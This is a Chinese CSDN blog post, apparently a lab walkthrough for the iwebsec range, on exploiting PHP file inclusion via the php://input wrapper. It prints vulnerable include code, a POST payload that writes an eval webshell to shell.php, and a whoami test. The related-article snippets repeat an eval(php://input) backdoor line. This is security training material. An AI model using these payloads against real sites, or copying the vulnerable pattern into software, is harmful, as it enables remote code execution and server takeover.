iwebsec靶场文件包含漏洞-php://input伪协议及利用

最新推荐文章于 2024-04-20 21:27:09 发布
最新推荐文章于 2024-04-20 21:27:09 发布
阅读量565 收藏 3
点赞数 4
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56041380/article/details/129968855
版权

php://input 

php://input可以访问请求的原始数据的只读流,即可以直接读取POST上没有经过解析的原始数据,但是使用enctype="multipart/form-data"的时候php://input是无效的。

源码分析

	
<?php
    echo file_get_contents("php://input");
	
?>

上面的代码输出file_get_contents函数获取php://input数据。测试时传入POST数据——a=123

说明php://input可以获取POST传入的数据

写入木马 

利用php://input写入木马时,PHP配置文件需要开启allow_url_include不需要开启allow_url_fopen。

如果传入的数据是PHP代码就可以写入代码

源码分析

<?php
	if(isset($_GET['filename'])){
	
    $filename  = $_GET['filename'];
    include($filename);
	}else{
		exit();
	}
	
?>

通过POST方式传入的写入木马的PHP代码是

<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[123]);?>');?>

 这里也就传进来了

执行命令

使用burpsuit进行抓包,可以获得下面的数据

 可以先改成post方式传入数据,然后写入要执行的命令

 这样我们就获得了(whoami)的结果

古木木木木木
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP、Apache环境中部署upload-labs(文件上传漏洞靶场)
01-08
PHP、Apache环境中部署upload-labs(文件上传漏洞靶场)
配合php伪协议利用文件包含漏洞
超人学飞的日子
06-06 9179
php支持多种封装协议,这些协议常被CTF出题中与文件包含漏洞结合,这里做个小总结。实验用的是DVWA平台,low级别,phpstudy中的设置为5.4.45版本,设置allow_url_fopen和allow_url_include都为On.index.phpindex.php同级目录下有mytest001.txt ,mytest002.txt ,mytest003.zip(其中包含mytest...
iwebsec靶场 文件包含漏洞通关笔记1-本地文件包含漏洞
最新发布
mooyuan的博客
04-20 1195
文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。比如 在PHP中,提供了:这些文件包含函数,这些函数在代码设计中被经常使用到。
php伪协议语法,php文件包含漏洞input与filter)
weixin_39881167的博客
03-10 1619
php://inputphp://input可以读取没有处理过的POST数据。相较于$HTTP_RAW_POST_DATA而言,它给内存带来的压力较小,并且不需要特殊的php.ini设置。php://input不能用于enctype=multipart/form-data。php://filter协议协议语法:php://filter:/=php://filter 的 参数列表read      ...
fileclude(文件包含漏洞php://inputphp://filter的使用)
Welcome To Myon'Blog !
04-16 3687
fileclude、文件包含漏洞php://inputphp://filter、file_get_contents() 函数、empty()函数、isset函数、PHP伪协议
文件包含漏洞+php伪协议
unexpectedthing的博客
11-11 6098
文章目录常见的文件包含函数基本绕过:利用php伪协议1.php://input2.php://filter3.data协议4.zip协议5.bzip2://协议6.zlib://协议7. phar://协议8..file协议日志包含介绍利用条件漏洞利用流程日志文件路径远程文件包含条件流程PHPSESSION包含包含/proc/self/environ文件包含临时文件过程包含上传文件绕过类型指定后缀绕过利用长度截断%00截断url指定前缀截断目录遍历编码参考文献 常见的文件包含函数 php文件包含函数有下面四
文件包含漏洞
qq_52016943的博客
08-17 2224
文件包含漏洞
bugku never_give_up file_get_contents()有php://input漏洞 eregi \x00绕过
YouthBelief的博客
03-07 2971
bugku never_give_up0x00 never_give_up0x01 解题流程1.1查看首页 及源码1.2 访问1p.html1.3解码1.4 分析代码1.5 payload 0x00 never_give_up 0x01 解题流程 1.1查看首页 及源码 发现一个页面 访问 1.2 访问1p.html 自动跳转到主页 直接查看源码 得到JS代码 其中申明 words变量 和OutWord()方法 将 escape解码后的words变量写入页面中。 words 变量 经过 url编码
【网络安全篇】php伪协议-漏洞及其原理
qq_53058639的博客
01-29 777
🏆今日学习目标:🍀学习php伪协议✅创作者:贤鱼⏰预计时间:35分钟🍁贤鱼的个人社区,欢迎你的加入🍁如果有需要可以查看下面文章。
文件包含漏洞input、filter、zip)
m0_70349048的博客
03-17 1074
可以访问请求的原始数据的只读流,将请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。从而导致任意代码执行。先访问这个页面然后抓包进行上传并访问恶意代码,可以看到phpinfo()已经执行。
php input 漏洞,php://inputphp://filter,data URI schema的那些事
weixin_36400833的博客
03-11 1603
一、php://input一句话木马在调研dedecms的历史漏洞时,发现了dedecms安装文件曾经出过被植入后门的漏洞(SSV-ID站点include目录下shopcar.class.php文件被植入一句话木马)@eval(file_get_contents('php://input'))我是个十足的php菜鸟,只有用到的时候才会去查查语法书,对php://input也只是有点印象而已,于是用...
CVE-2021-22192 靶场: 未授权用户 RCE 漏洞.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
CVE-2020-13933 靶场: shiro 认证绕过漏洞.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
PHP文件包含漏洞利用思路与Bypass总结手册(一)
蚁景网安学院
04-29 3931
这个手册主要是记录针对PHP文件包含漏洞利用思路与Bypass手法的总结。
PHP文件包含漏洞-(可补充)
Xor0ne
04-29 442
2020/04/28 每日一剂 include()函数 <?php $file = $_GET['file']; include($file); echo "Error 404!!!"; ?> require()函数 <?php $file = $_GET['file']; require($file); echo "Error 404!!!"; ?> ...
渗透测试练习No.18 利用phpinfo+LFI(文件包含漏洞)打进主机
hljzzj的博客
01-23 6718
phpinfo文件上传+LFI(文件包含)获取shell,suid提权
php://filter(文件包含漏洞利用)及php://input(转载)
知足且坚定,温柔且上进
02-08 1213
php://filter 文件包含漏洞:https://blog.csdn.net/fageweiketang/article/details/80699051 筛选过滤应用: 1、 字符串过滤器: ·string.rot13 对字符串执行ROT13转换 ·string.toupper转换为大写 ·string.tolower 转换为小写 ·string.strip_tags去除html和p...
渗透测试-文件包含漏洞以及php伪协议的应用
lza20001103的博客
07-20 2947
渗透测试-文件包含漏洞以及php伪协议的应用
文件包含漏洞(一)
不秃头的程序Yang
06-29 1376
二、常见文件包含函数 三、代码分析 四、利用方法 五、本地文件包含 1、文件包含/etc/passwd 3.2 搭建测试环境 3.3 抓包测试 文件包含图片 包含日志文件getshell 包含环境变量getshell
iwebsec靶场搭建
07-28
iwebsec靶场是一个漏洞集成容器,其中集成了大量的web漏洞环境,包括SQL注入、文件包含、命令执行、XXE、反序列化、SSRF、XSS、文件上传等常见的漏洞环境。\[1\] 要搭建iwebsec靶场,可以使用docker来运行容器。可以使用以下命令来启动靶场并将宿主机的8001端口映射给iwebsec靶场的80服务: docker run --restart=always --name iwebsec -it -dp 8001:80 iwebsec/iwebsec \[2\] 这样每次启动靶场时,都会自动运行,并且宿主机的8001端口会映射给靶场的80服务。 需要注意的是,iwebsec靶场还包含一些漏洞渗透,如redis数据库漏洞和MySQL数据库漏洞。如果需要进行渗透测试,需要将iwebsec靶场中的redis服务端口号和MySQL服务端口号映射到主机端口中。可以使用以下命令来查找iwebsec的配置文件: find / -name iwebsec_info.md \[3\] #### 引用[.reference_title] - *1* [Web安全 iwebsec 靶场搭建.](https://blog.csdn.net/weixin_54977781/article/details/130341391)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [iwebsec靶场搭建](https://blog.csdn.net/mooyuan/article/details/128031434)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值